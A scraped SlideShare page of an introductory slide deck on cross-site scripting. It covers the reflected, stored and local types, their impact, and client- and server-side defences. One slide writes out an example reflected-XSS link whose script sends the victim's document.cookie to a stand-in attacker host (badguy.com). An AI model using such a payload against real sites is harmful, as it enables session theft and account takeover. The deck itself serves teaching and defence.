Successfully reported this slideshow.
We use your LinkedIn profile and activity data to personalize ads and to show you more relevant ads. You can change your ad preferences anytime.

Xss (cross site scripting)

857 views

Published on

Xss (cross site scripting)

Published in: Social Media
  • Be the first to comment

Xss (cross site scripting)

  1. 1. •••••••••••••••••••••••••••••••••• ••••••••••••••••••••••••••••••••••
  2. 2. What is XSS (Cross Site Scripting) ? Types of XSS (Cross Site Scripting) What is the impact of Cross Site Scripting ? How can we protect applications against XSS ?
  3. 3. •••••••••••••••••••••••••••••••••• Cross-site scripting (XSS) is a type of computer security vulnerability typically found in Web applications. XSS enables attackers to inject client-side script into Web pages.  Embedded in HTML page  Supports different languages (JavaScript, VBScript, ActiveX, etc.)  Most prominent: JavaScript  Attacker „makes“ Web-Server deliver malicious script code  Malicious script is executed in Client’s Web Browser Scripting : Web Browsers can execute commands Cross-Site : Foreign script sent via server to client Caused by insufficient input validation.
  4. 4. ••••••••••••••••••••••••••••••••••  Reflected XSS (Non-Persistent) Three types of XSS : – Link in other website or email  Stored XSS (Persistent) – Forum, bulletin board, feedback form  Local XSS – PDF Adobe Reader, Flash player
  5. 5. •••••••••••••••••••••••••••••••••• Send e-mail with </script> tags embedded in link Follow the link and script executes http://mybank.com/account.php?variable=„> <script>document.location=‚http://badguy.com/cgi- bin/cookie.cgi‘“%20+document.cookie</script> Attacker www.badguy.com Coockie Collector !!! attack code !!! Reflected XSS (Non-Persistent) : Victim  Malicious content does not get stored in the sever  The server bounces the original input to the victim without modification
  6. 6. •••••••••••••••••••••••••••••••••• Post Forum Message: Subject: GET Money for FREE !!! Body: <script> attack code </script> 1. Attacker sends malicious code 2. Server stores message Did you know this? ..... 3. User requests message 4. Message is delivered by server 5. Browser executes script in message GET Money for FREE !!! <script> attack code </script> Get /forum.jsp?fid=122&mid=2241 Attacker Client Web Server GET Money for FREE !!! <script> attack code </script> !!! attack code !!! Re: Error message on startup ..... I found a solution! ..... Can anybody help? ..... Error message on startup ..... Stored XSS (Persistent) :
  7. 7. •••••••••••••••••••••••••••••••••• Local XSS :  The injected script does not traverse to the server
  8. 8. ••••••••••••••••••••••••••••••••••  Normal Users : Access to authentication credentials forWeb application – Access to personal data (Credit card, Bank Account) – Access to business data (Bid details, construction details) – Misuse account (order expensive goods)  High Privileged Users : – Control over Web application – Control / Access : Web server machine – Control / Access : Backend / Database systems
  9. 9. ••••••••••••••••••••••••••••••••••  Denial-of-Service : – Crash user’s bowser, Pop-up flodding, Redirection  Access to user’s machine : – Upload local data to attacker’s machine
  10. 10. ••••••••••••••••••••••••••••••••••  Client Side : – Disable JS – Verify e-mail – Always update  Server Side : – Input validation – Encode all meta characters send to the client – Keep track of user sessions – Web application firewall – Always test
  11. 11. ••••••••••••••••••••••••••••••••••

×